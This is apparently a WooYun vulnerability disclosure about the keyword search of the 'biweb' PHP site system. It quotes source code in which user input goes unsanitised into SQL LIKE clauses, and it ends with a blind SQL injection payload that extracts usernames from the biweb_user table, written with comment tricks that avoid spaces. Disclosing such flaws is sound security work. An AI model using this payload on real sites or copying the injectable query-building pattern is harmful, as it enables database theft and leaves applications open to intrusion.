WooYun.org

<?php
//过滤GET或POST的值，去除两端空格和转义符号
if ($_SERVER['REQUEST_METHOD'] == 'POST'){
	check::filtrateData($_POST,$arrGPdoDB['htmlspecialchars']);
}elseif($_SERVER['REQUEST_METHOD'] == 'GET'){
	check::filtrateData($_GET,$arrGPdoDB['htmlspecialchars']);
}
?>

无关代码
if(!empty($_REQUEST['keywords'])){
	$strKeywords = strval(urldecode($_REQUEST['keywords']));
	if($strKeywords[0] == '/'){
		//精确查询ID
		$strKeywords = substr($strKeywords,1);
		if(is_numeric($strKeywords)) $arrWhere[] = "id = '" . $strKeywords . "'";
	}else{
		$arrKeywords = explode(' ', $strKeywords);
		foreach($arrKeywords as $v){
			$v = trim($v);
			if(!empty($v)){
				if (isset($_GET['radio'])){
					$intTemp = intval($_GET['radio']);
					switch($intTemp){
						case 0:
							$arrWhere[] = "brand LIKE '%$v%'";
							$arrWhere[] = "model LIKE '%$v%'";
							$arrWhere[] = "code LIKE '%$v%'";
							$arrWhere[] = "title LIKE '%$v%'";
							break;
						case 1:
							$arrWhere[] = "brand LIKE '%$v%'";
							break;
						case 2:
							$arrWhere[] = "model LIKE '%$v%'";
							break;
						case 3:
							$arrWhere[] = "code LIKE '%$v%'";
							break;
						case 4:
							$arrWhere[] = "title LIKE '%$v%'";
							break;
					}
					$arrLink[] = 'radio=' . $intTemp;
				}else $arrWhere[] = "title LIKE '%$v%'";
			}
		}
	}
	$arrLink[] = 'keywords=' . urlencode($strKeywords);
}else check::AlertExit("错误：关键词必须填写!",-1);
$strWhere = '';
$strWhere = implode(' or ',$arrWhere);
$strWhere = 'where pass=1 and '.$strWhere;
$arrInfoList = $objWebInit->getInfoList($strWhere, ' ORDER BY submit_date DESC',($intPage-1)*$arrGPage['page_size'],$arrGPage['page_size'],true);
$intRows = $arrInfoList['COUNT_ROWS'];
unset($arrInfoList['COUNT_ROWS']);
无关代码

function getInfoList($where='',$order='',$intStartID = 0,$intListNum = 0,$field = '*',$arrData = array(),$blCount = true,$blComplex = false){
		$table = $this->tablename2;
		$arrData=(empty($arrData)?array():$arrData);
		$limit = '';
		if($blComplex){
			if($where != '') $where .= " and id <= ( SELECT id FROM `$table` $order LIMIT $intStartID, 1 )";
			else $where = " where id <= ( SELECT id FROM `$table` $order LIMIT $intStartID, 1 )";
		}
		if (!empty($order)) {
			$limit .= $order;
		}
		if (!empty($intListNum)) $limit .= " LIMIT " . $intStartID .','. $intListNum;
		$blFetch = false;
		if($field === true) {
			unset($this->arrGPdoDB['db_table_field']['structon_tb']);
			$field = implode(',',array_keys($this->arrGPdoDB['db_table_field']));
		}
		$arrData = $this->selectDataG($table,$where,$limit,$field,$blFetch,$arrData,$blCount);
		if(isset($arrData[0]['structon_tb'])) $arrData = $this->loadTableFieldG($arrData);
		return $arrData;
	}

function selectDataG($table,$where = '',$limit = '',$field = '*',$blFetch = false,$arrData = array(),$blCount = false,$blComplex = false ){
		try {
			//$strSQL = "SELECT SQL_CALC_FOUND_ROWS $field from $table $where";		效率低下,在MYSQL版本未改进之前弃用
			$strSQL = "SELECT $field from $table $where $limit";
			if($this->arrGPdoDB['PDO_CACHE']) {
				$strCacheName = md5($strSQL);
				$strCacheDir = '';
				for($i=0;$i<32;$i+=2){
					$strCacheDir .= '/'.$strCacheName[$i].$strCacheName[$i+1];
				}
				$strCacheName = $strCacheDir.'SQL_'.$table.'_'.$strCacheName;
				$strCacheFile = $this->arrGPdoDB['PDO_CACHE_ROOT'].'/'.$strCacheName;
				$objCache = new cache($strCacheFile,$this->arrGPdoDB['PDO_CACHE_LIFETIME']);
				if($this->arrGPdoDB['PDO_CACHE']==1) {
					if($objCache->cache_is_active()) {
						include($strCacheFile);
						if($arr['COUNT_ROWS'] != '' ) $_SESSION['COUNT_ROWS'] = $arr['COUNT_ROWS'];
						else $arr['COUNT_ROWS'] = $_SESSION['COUNT_ROWS'];
						return $arr;
					}
				}
			}
			if($this->arrGPdoDB['PDO_DEBUG']) echo $strSQL.'<br><br>';
			$rs = $this->db->prepare($strSQL);
			$rs->execute($arrData);
			if($blFetch) $arr = $rs->fetch();
			else  $arr = $rs->fetchAll();
			$rs = '';
			if($blCount){
					//$strSQL = "SELECT FOUND_ROWS()";		配合SQL_CALC_FOUND_ROWS使用的
					//$strSQL = "SELECT count(DISTINCT id) from $table $where";
					if(!$blComplex){
						$strSQL = "SELECT count(*) as num from $table $where";
						if($this->arrGPdoDB['PDO_DEBUG']) echo $strSQL.'<br><br>';
						$rs = $this->db->query($strSQL);
						if(strpos($where,'GROUP') || strpos($where,'group')){
							$arrTemp = $rs->fetchAll();
							$arr['COUNT_ROWS'] = count($arrTemp);
						}else{
							$arrTemp = $rs->fetch();
							$arr['COUNT_ROWS'] = $arrTemp['num'];
						}
					}
					if($arr['COUNT_ROWS'] != '' ) $_SESSION['COUNT_ROWS'] = $arr['COUNT_ROWS'];
					else $arr['COUNT_ROWS'] = $_SESSION['COUNT_ROWS'];
			}
			if($this->arrGPdoDB['PDO_CACHE']){
				if(isset($objCache)&&is_object($objCache)) {
					$somecontent = '<?php' . "\n" . '$arr = ' . var_export( $arr, true ) . ';' . "\n" . '?>';
					$objCache->write_file($somecontent);
				}
			}
			return $arr;
		} catch (PDOException $e) {
			echo $strSQL.'<br><br>';
		    echo 'Failed: ' . $e->getMessage().'<br><br>';
		}
	}

%%'/**/and/**/mid((select/**/user_name/**/from/**/biweb_user/**/limit/**/0,1),1,1)='a'/**/and/**/'%'='